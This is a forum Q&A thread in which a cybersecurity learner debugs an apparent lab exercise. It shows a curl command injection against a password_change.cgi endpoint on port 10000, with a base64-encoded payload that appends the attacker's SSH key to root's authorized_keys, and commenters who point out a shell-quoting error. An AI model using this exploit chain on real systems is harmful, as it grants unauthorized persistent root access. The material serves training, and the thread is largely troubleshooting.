# SSH: Permission Denied (publickey,password)

Tags: ssh, key-authentication

new to cybersecurity bear w/me. Just a learning situation is all, to progress onwards I took it far as I
could it asked me to prepare & encode the PAYLOAD etc. I did those 4 steps.
Why after generating a public/private rsa keypair, I am still not able to ssh access the server after input of password? - root@192.168.6.2: Permission denied (publickey,password)
I input the generated key it asked for with no luck, also foobar1 didn't work nor the combo of (publickey&password)just to try.
I have attempted; ssh-copy-id -i ~/.ssh/id_rsa root@192.168.6.2 (doesn't work keeps asking for password)
The very last part at bottom has me perplexed! how would I write it? Can someone plz provide clarity/guidance to resolve it.
I have provided the entire step by step procedure on terminal to see as follows:

```
root@kali:~# ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): /root/.ssh/id_rsa
/root/.ssh/id_rsa already exists.
Overwrite (y/n)? y
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/.ssh/id_rsa
Your public key has been saved in /root/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:Hp6lH+aI8JAlpRWQ1b8DGzxWOwbu6YGq6znjzP6sDKs root@kali
The key's randomart image is:
+---[RSA 3072]----+
|    .+o.         |
|    .  .o .      |
|      oo + .     |
|     +  B =      |
|    o .+SB.o     |
|     +.o==o      |
|.   +. .=.o.     |
| *oo.+ ..= .     |
|E+%Bo o . o      |
+----[SHA256]-----+
root@kali:~# echo -n '$COMMAND' | base64 -w 0      
JENPTU1BTkQ=root@kali:~# PAYLOAD="echo%20$(echo "JENPTU1BTkQ=" | base64 -d)|sh"
root@kali:~# PAYLOAD=$(echo $PAYLOAD | sed 's/%/%25/g; s/ /%20/g; s/|/%7C/g')  
root@kali:~# PAYLOAD="echo%20JENPTU1BTkQ=%3D%7Cbase64%20-d%7Csh"
root@kali:~#  curl -ks "http://192.168.6.2:10000/password_change.cgi" -d user=root&pam=&expired=2;
PAYLOAD="echo%20JENPTU1BTkQ=%3D%7Cbase64%20-d%7Csh"&old=foobar&new1=foobar1&new2=foobar1 
[1] 1922
[2] 1923
[3] 1924
[4] 1925
[5] 1926

[1]   Done                    curl -ks "http://192.168.6.2:10000/password_change.cgi" -d user=root
[2]   Done                    pam=
[3]   Done                    PAYLOAD="echo%20Q09NTUFORA==%3D%7Cbase64%20-d%7Csh"
[4]-  Done                    old=foobar
[5]+  Done                    new1=foobar1
root@kali:~# ssh root@192.168.6.2
root@192.168.6.2's password: Hp6lH+aI8JAlpRWQ1b8DGzxWOwbu6YGq6znjzP6sDKs
Permission denied, please try again.
root@192.168.6.2: Permission denied (publickey,password).

(attempted to copy key to target server)
root@kali:~# ssh-copy-id root@192.168.6.2
/usr/bin/ssh-copy-id: INFO: Source of key(s) to be installed: "/root/.ssh/id_rsa.pub"
/usr/bin/ssh-copy-id: INFO: attempting to log in with the new key(s), to filter out any that are already installed
/usr/bin/ssh-copy-id: INFO: 1 key(s) remain to be installed -- if you are prompted now it is to install the new keys
root@192.168.6.2's password: foobar1 
Permission denied, please try again.
```

Run the following commands to exploit the web service and add your SSH key:

Prepare the command that will be executed in the target server to add your SSH key
COMMAND="echo '$(cat ~/.ssh/id_rsa.pub)' >> /root/.ssh/authorized_keys"  (DONE)
Prepare and encode the payload
PAYLOAD="echo%20$(echo "$COMMAND" | base64 -w 0)|base64%20-d|sh"  (DONE)
Exploit the RCE vulnerability and execute the payload  (VERY CONFUSED, parts look un-necessary - shell attempts to run several things in the background (most of them just set a variable to a particular value in a subshell, which then exits, and the variable & value are lost)
curl -ks "http://192.168.6.2:10000/password_change.cgi" -d "user=root&pam=&expired=2;$PAYLOAD&old=foobar&new1=foobar1&new2=foobar1" -H "Referer: [http://192.168.6.2:10000"](http://192.168.6.2:10000%22)

Comment: Check [this](https://askubuntu.com/q/511833)

Comment: Your curl command failed because you didn't quote the value for the `-d` option.  `&` in sh means roughly "execute everything on the line so far in the background".  You have several `&` symbols in the data string, so your shell attempts to run several things in the background (most of them just set a variable to a particular value in a subshell, which then exits, and the variable & value are lost), which is why you have all those [1]...[5] job notices followed by Done notices for them.   The `curl` command itself sees only up to `-d user=root`

Comment: I have no idea what your `password_change.cgi` script is supposed to do, or if it works or not.  and I'm going to completely ignore the fact that allowing root's password to be changed without any authentication check is a massive security hole, that's a separate problem.    But your CGI script has no chance at all of working if you're not giving it all the data it needs because you failed to quote the data string.

Comment: To copy the ID to recipient: `ssh-copy-id -i ~/.ssh/id_rsa user@destination`. If the SSH server is correctly configured, after this you can access it with simply `ssh user@destination`. In my internal network (OpenSSH v8.4p1 Debian -5+deb11u1) just `ssh destination` is enough.

Comment: Can you make the question more readable please - the bits you show from the command line are almost illegible

Comment: If you are learning, then you really should not try to learn on Kali. That will only make things harder for absolutely no benefit. Learn on a regular Linux, all of them can do everything Kali can do, and then if you start working professionally and need a pen-testing system to carry around with you or test you work, _then_ use Kali.

Comment: This seems like the same question as the one you deleted yesterday, only without the helpful editing that users made to make it understandable, so I will undelete that one instead and merge it with this. Please don't do this again.

Comment: Voting to close as the asker now claims they've already resolved the issue.

Comment: @Shadur That just means they should either accept the answer or write their own one. We don't close questions because they are resolved unless the solution was due to a trivial typo or the issue went away by itself in a manner that the question no longer makes sense.

Answer (score 1):

`ssh-copy-id` uses SSH to copy your public key into the `~/.ssh/authorized_keys` file on the target user account on the target system.

In order to do so, you *will need to provide it with the means to log in via ssh to the target user account on the target system*.

It means you'll need to input the password *once* to allow it to connect; afterwards you'll be able to log in with just your SSH key.

I've cut away the rest of the garbled mess since it looked like you were trying to use some kind of unspecified http exploit to try to gain root access to a system, which is well beyond the scope of your actual question.

Comment: the module wanted me to do a command encode/payload prep to gain access to try to ssh into server which I did 4 steps, but the last one has me stuck -Exploit the RCE vulnerability and execute the payload. I would like to know how to correctly write this following command:
curl -ks "http://192.168.6.2:10000/password_change.cgi" -d "user=root&pam=&expired=2;$PAYLOAD&old=foobar&new1=foobar1&new2=foobar1" -H "Referer: http://192.168.6.2:10000" (not sure if payload is even necessary)
   tried /root/.ssh/authorized_keys,  ssh-copy-id , ssh-copy-id -i ~/.ssh/id_rsa root@192.168.6.2 , don't work

Comment: You missed an opening quote mark.